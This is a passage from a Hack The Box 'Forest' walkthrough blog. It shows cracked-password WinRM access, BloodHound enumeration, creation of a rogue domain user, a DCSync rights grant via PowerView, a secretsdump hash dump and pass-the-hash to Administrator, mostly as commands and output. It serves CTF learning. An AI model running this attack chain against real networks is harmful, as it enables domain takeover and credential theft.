s3rvice          <span class="o">(</span><span class="nv">$krb5asrep$23$svc</span><span class="nt">-alfresco</span>@HTB.LOCAL<span class="o">)</span>
1g 0:00:00:18 DONE <span class="o">(</span>2021-09-03 16:01<span class="o">)</span> 0.05543g/s 226480p/s 226480c/s 226480C/s s3s1k2..s3rj12
Use the <span class="s2">"--show"</span> option to display all of the cracked passwords reliably
Session completed

kali@kali:~/ctf/htb/forest<span class="nv">$ </span>evil-winrm <span class="nt">-u</span> svc-alfresco <span class="nt">-p</span> s3rvice <span class="nt">-i</span> htb.local

Evil-WinRM shell v3.2

Info: Establishing connection to remote endpoint

<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\s</span>vc-alfresco<span class="se">\D</span>ocuments&gt; <span class="nb">type</span> ..<span class="se">\D</span>esktop<span class="se">\u</span>ser.txt
368cfa08<span class="k">************************</span>
<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\s</span>vc-alfresco<span class="se">\D</span>ocuments&gt; 
</code></pre></div></div>

<p>Which we definitely can.</p>

<h2 id="privesc-to-administrator">Privesc to Administrator</h2>

<p>Since the box is called Forest, I don‚Äôt anticipate needing to run <a href="https://github.com/carlospolop/PEASS-ng">winPEAS</a>, although I normally would. In this case, I‚Äôm going to jump straight to Bloodhound, a tool that can map out relationships in an Active Directory environment to advise us as to what to do next.</p>
<ul>
  <li>Install bloodhound and neo4j: <code class="language-plaintext highlighter-rouge">sudo apt install bloodhound neo4j</code></li>
  <li>Download PowerView: [<a href="https://github.com/PowerShellMafia/PowerSploit">link</a>]</li>
</ul>

<p>I‚Äôm going to copy <code class="language-plaintext highlighter-rouge">SharpHound.ps1</code> and <code class="language-plaintext highlighter-rouge">PowerView.ps1</code> to the DC using <code class="language-plaintext highlighter-rouge">evil-winrm</code>‚Äôs built in upload and download command:</p>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">*</span><span class="n">Evil-WinRM</span><span class="o">*</span><span class="w"> </span><span class="nx">PS</span><span class="w"> </span><span class="nx">C:\Users\svc-alfresco\Documents</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">upload</span><span class="w"> </span><span class="o">.</span><span class="nx">/www/PowerView.ps1</span><span class="w"> </span><span class="o">.</span><span class="w">
</span><span class="n">Info:</span><span class="w"> </span><span class="nx">Uploading</span><span class="w"> </span><span class="o">.</span><span class="nx">/www/PowerView.ps1</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="o">.</span><span class="w">                                      
</span><span class="kr">Data</span><span class="p">:</span><span class="w"> </span><span class="mi">1027036</span><span class="w"> </span><span class="n">bytes</span><span class="w"> </span><span class="nx">of</span><span class="w"> </span><span class="nx">1027036</span><span class="w"> </span><span class="nx">bytes</span><span class="w"> </span><span class="nx">copied</span><span class="w">

</span><span class="n">Info:</span><span class="w"> </span><span class="nx">Upload</span><span class="w"> </span><span class="nx">successful</span><span class="o">!</span><span class="w">

</span><span class="o">*</span><span class="n">Evil-WinRM</span><span class="o">*</span><span class="w"> </span><span class="nx">PS</span><span class="w"> </span><span class="nx">C:\Users\svc-alfresco\Documents</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">upload</span><span class="w"> </span><span class="o">.</span><span class="nx">/www/SharpHound.ps1</span><span class="w"> </span><span class="o">.</span><span class="w">
</span><span class="n">Info:</span><span class="w"> </span><span class="nx">Uploading</span><span class="w"> </span><span class="o">.</span><span class="nx">/www/SharpHound.ps1</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="o">.</span><span class="w">                                         
</span><span class="kr">Data</span><span class="p">:</span><span class="w"> </span><span class="mi">1298980</span><span class="w"> </span><span class="n">bytes</span><span class="w"> </span><span class="nx">of</span><span class="w"> </span><span class="nx">1298980</span><span class="w"> </span><span class="nx">bytes</span><span class="w"> </span><span class="nx">copied</span><span class="w">

</span><span class="n">Info:</span><span class="w"> </span><span class="nx">Upload</span><span class="w"> </span><span class="nx">successful</span><span class="o">!</span><span class="w">
</span></code></pre></div></div>

<p>Once I‚Äôve uploaded both powershell modules, I‚Äôll import them by doing <code class="language-plaintext highlighter-rouge">. .\SharpHound.ps1</code> and <code class="language-plaintext highlighter-rouge">. .\PowerView.ps1</code>. It might look weird, but this way of doing it has always been most consistent for me.</p>

<p>On my Kali machine, I‚Äôm going to start bloodhound by running <code class="language-plaintext highlighter-rouge">bloodhound</code>, and start the <code class="language-plaintext highlighter-rouge">neo4j</code> database using <code class="language-plaintext highlighter-rouge">sudo neo4j console</code>. I‚Äôll sign in as needed.</p>

<p>After that‚Äôs taken care of, I‚Äôll run the following command on the DC:</p>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">*</span><span class="n">Evil-WinRM</span><span class="o">*</span><span class="w"> </span><span class="nx">PS</span><span class="w"> </span><span class="nx">C:\Users\svc-alfresco\Documents</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Invoke-Bloodhound</span><span class="w"> </span><span class="nt">-CollectionMethod</span><span class="w"> </span><span class="nx">All</span><span class="w"> </span><span class="nt">-Domain</span><span class="w"> </span><span class="nx">htb.local</span><span class="w"> </span><span class="nt">-ZipFileName</span><span class="w"> </span><span class="nx">lootme.zip</span><span class="w">
</span></code></pre></div></div>

<p>This will allow me to collect all of the Active Directory data that this service account has to offer. I‚Äôll download the zip file that comes off of it, and drag and drop it right into Bloodhound. After that‚Äôs unzipped and loaded in, I‚Äôll mark <code class="language-plaintext highlighter-rouge">svc-alfresco</code> as ‚Äúowned‚Äù and look for ‚ÄúShortest Path to Domain Admins‚Äù.</p>

<p>![[Pasted image 20210903163250.png]]</p>

<p><em>Your path might look different than mine, but these privesc steps are all the same.</em></p>

<p>Here we see a fairly large graph. As you‚Äôll notice, there are actually two domains in this environment, <code class="language-plaintext highlighter-rouge">htb.local</code> and <code class="language-plaintext highlighter-rouge">forest.htb.local</code>, which is why this box is named the way it is (2 joined domains are a forest).</p>

<p>From svc-alfresco, marked with a skull, we see two jumps necessary to get to domain admin. Since svc-alfresco is a part of the Account Operators group, it has the generic all privilege on the Exchange Windows Permissions group. Right clicking the edge to learn more, we find the following abuse info:
![[Pasted image 20210903163652.png]]</p>

<p>Essentially, this means we can give our account, or any account, DCSync Privileges, which can allow us to run secretsdump.py or mimikatz to dump hashes. If this works, we can use the NT hash we get to pass the hash and become administrator.</p>

<h2 id="execution">Execution</h2>

<p>Since this is a public box, I don‚Äôt want to make it easy so I‚Äôll make my own account first and add it to the Exchange Windows Permissions group.</p>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">*</span><span class="n">Evil-WinRM</span><span class="o">*</span><span class="w"> </span><span class="nx">PS</span><span class="w"> </span><span class="nx">C:\Users\svc-alfresco\Documents</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">net</span><span class="w"> </span><span class="nx">user</span><span class="w"> </span><span class="nx">An00bRektn</span><span class="w"> </span><span class="nx">An00bRektn</span><span class="w"> </span><span class="nx">/add</span><span class="w"> </span><span class="nx">/domain</span><span class="w">
</span><span class="n">The</span><span class="w"> </span><span class="nx">command</span><span class="w"> </span><span class="nx">completed</span><span class="w"> </span><span class="nx">successfully.</span><span class="w">

</span><span class="o">*</span><span class="n">Evil-WinRM</span><span class="o">*</span><span class="w"> </span><span class="nx">PS</span><span class="w"> </span><span class="nx">C:\Users\svc-alfresco\Documents</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">net</span><span class="w"> </span><span class="nx">group</span><span class="w"> </span><span class="s2">"Exchange Windows Permissions"</span><span class="w"> </span><span class="nx">/add</span><span class="w"> </span><span class="nx">An00bRektn</span><span class="w">
</span><span class="n">The</span><span class="w"> </span><span class="nx">command</span><span class="w"> </span><span class="nx">completed</span><span class="w"> </span><span class="nx">successfully.</span><span class="w">
</span></code></pre></div></div>

<p>We then attempt give ourselves DC Sync Rights according to the Bloodhound Abuse Info.</p>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">*</span><span class="n">Evil-WinRM</span><span class="o">*</span><span class="w"> </span><span class="nx">PS</span><span class="w"> </span><span class="nx">C:\Users\svc-alfresco\Documents</span><span class="err">&gt;</span><span class="w"> </span><span class="nv">$SecPassword</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ConvertTo-SecureString</span><span class="w"> </span><span class="s1">'An00bRektn'</span><span class="w"> </span><span class="nt">-AsPlainText</span><span class="w"> </span><span class="nt">-Force</span><span class="w">
</span><span class="o">*</span><span class="n">Evil-WinRM</span><span class="o">*</span><span class="w"> </span><span class="nx">PS</span><span class="w"> </span><span class="nx">C:\Users\svc-alfresco\Documents</span><span class="err">&gt;</span><span class="w"> </span><span class="nv">$Cred</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">New-Object</span><span class="w"> </span><span class="nx">System.Management.Automation.PSCredential</span><span class="p">(</span><span class="s1">'HTB\An00bRektn'</span><span class="p">,</span><span class="w"> </span><span class="nv">$SecPassword</span><span class="p">)</span><span class="w">
</span><span class="o">*</span><span class="n">Evil-WinRM</span><span class="o">*</span><span class="w"> </span><span class="nx">PS</span><span class="w"> </span><span class="nx">C:\Users\svc-alfresco\Documents</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Add-DomainObjectAcl</span><span class="w"> </span><span class="nt">-Credential</span><span class="w"> </span><span class="nv">$Cred</span><span class="w"> </span><span class="nt">-TargetIdentity</span><span class="w"> </span><span class="nx">htb.local</span><span class="w"> </span><span class="nt">-Rights</span><span class="w"> </span><span class="nx">DCSync</span><span class="w">
</span><span class="n">The</span><span class="w"> </span><span class="nx">term</span><span class="w"> </span><span class="s1">'Add-DomainObjectAcl'</span><span class="w"> </span><span class="nx">is</span><span class="w"> </span><span class="nx">not</span><span class="w"> </span><span class="nx">recognized</span><span class="w"> </span><span class="nx">as</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">name</span><span class="w"> </span><span class="nx">of</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="nx">cmdlet</span><span class="p">,</span><span class="w"> </span><span class="nx">function</span><span class="p">,</span><span class="w"> </span><span class="nx">script</span><span class="w"> </span><span class="nx">file</span><span class="p">,</span><span class="w"> </span><span class="nx">or</span><span class="w"> </span><span class="nx">operable</span><span class="w"> </span><span class="nx">program.</span><span class="w"> </span><span class="nx">Check</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">spelling</span><span class="w"> </span><span class="nx">of</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">name</span><span class="p">,</span><span class="w"> </span><span class="nx">or</span><span class="w"> </span><span class="nx">if</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="nx">path</span><span class="w"> </span><span class="nx">was</span><span class="w"> </span><span class="nx">included</span><span class="p">,</span><span class="w"> </span><span class="nx">verify</span><span class="w"> </span><span class="nx">that</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">path</span><span class="w"> </span><span class="nx">is</span><span class="w"> </span><span class="nx">correct</span><span class="w"> </span><span class="nx">and</span><span class="w"> </span><span class="nx">try</span><span class="w"> </span><span class="nx">again.</span><span class="w">
</span><span class="n">At</span><span class="w"> </span><span class="nx">line:1</span><span class="w"> </span><span class="nx">char:1</span><span class="w">
</span><span class="o">+</span><span class="w"> </span><span class="n">Add-DomainObjectAcl</span><span class="w"> </span><span class="nt">-Credential</span><span class="w"> </span><span class="nv">$Cred</span><span class="w"> </span><span class="nt">-TargetIdentity</span><span class="w"> </span><span class="nx">htb.local</span><span class="w"> </span><span class="nt">-Righ</span><span class="w"> </span><span class="o">...</span><span class="w">
</span><span class="o">+</span><span class="w"> </span><span class="n">~~~~~~~~~~~~~~~~~~~</span><span class="w">
    </span><span class="o">+</span><span class="w"> </span><span class="nx">CategoryInfo</span><span class="w">          </span><span class="p">:</span><span class="w"> </span><span class="nx">ObjectNotFound:</span><span class="w"> </span><span class="p">(</span><span class="n">Add-DomainObjectAcl:String</span><span class="p">)</span><span class="w"> </span><span class="p">[],</span><span class="w"> </span><span class="n">CommandNotFoundException</span><span class="w">
    </span><span class="o">+</span><span class="w"> </span><span class="nx">FullyQualifiedErrorId</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">CommandNotFoundException</span><span class="w">
</span></code></pre></div></div>

<p>As you can see, Add-DomainObjectAcl wasn‚Äôt working. I took to Google, and found that I might need to specify a TargetIdentity and PrincipalIdentity. After some adjustments, we run it again.</p>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">*</span><span class="n">Evil-WinRM</span><span class="o">*</span><span class="w"> </span><span class="nx">PS</span><span class="w"> </span><span class="nx">C:\Users\svc-alfresco\Documents</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Add-DomainObjectAcl</span><span class="w"> </span><span class="nt">-Credential</span><span class="w"> </span><span class="nv">$Cred</span><span class="w"> </span><span class="nt">-TargetIdentity</span><span class="w"> </span><span class="s2">"DC=htb,DC=local"</span><span class="w"> </span><span class="nt">-PrincipalIdentity</span><span class="w"> </span><span class="nx">An00bRektn</span><span class="w"> </span><span class="nt">-Rights</span><span class="w"> </span><span class="nx">DCSync</span><span class="w">
</span></code></pre></div></div>

<p>We can then use secretsdump.py from impacket to dump all of the system hashes (output not shown because spoilers).</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kali@kali:~/ctf/htb/forest<span class="nv">$ </span>python3 /opt/impacket/examples/secretsdump.py <span class="nt">-just-dc</span> An00bRektn@htb.local
</code></pre></div></div>

<p>We pass the hash using <code class="language-plaintext highlighter-rouge">evil-winrm</code> and grab the root flag.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kali@kali:~/ctf/htb/forest<span class="nv">$ </span>evil-winrm <span class="nt">-u</span> Administrator <span class="nt">-H</span> 32693b11<span class="k">************************</span> <span class="nt">-i</span> htb.local

Evil-WinRM shell v3.2

Info: Establishing connection to remote endpoint

<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">type</span> ..<span class="se">\D</span>esktop<span class="se">\r</span>oot.txt
68e7ab70<span class="k">************************</span>
</code></pre></div></div>
:ET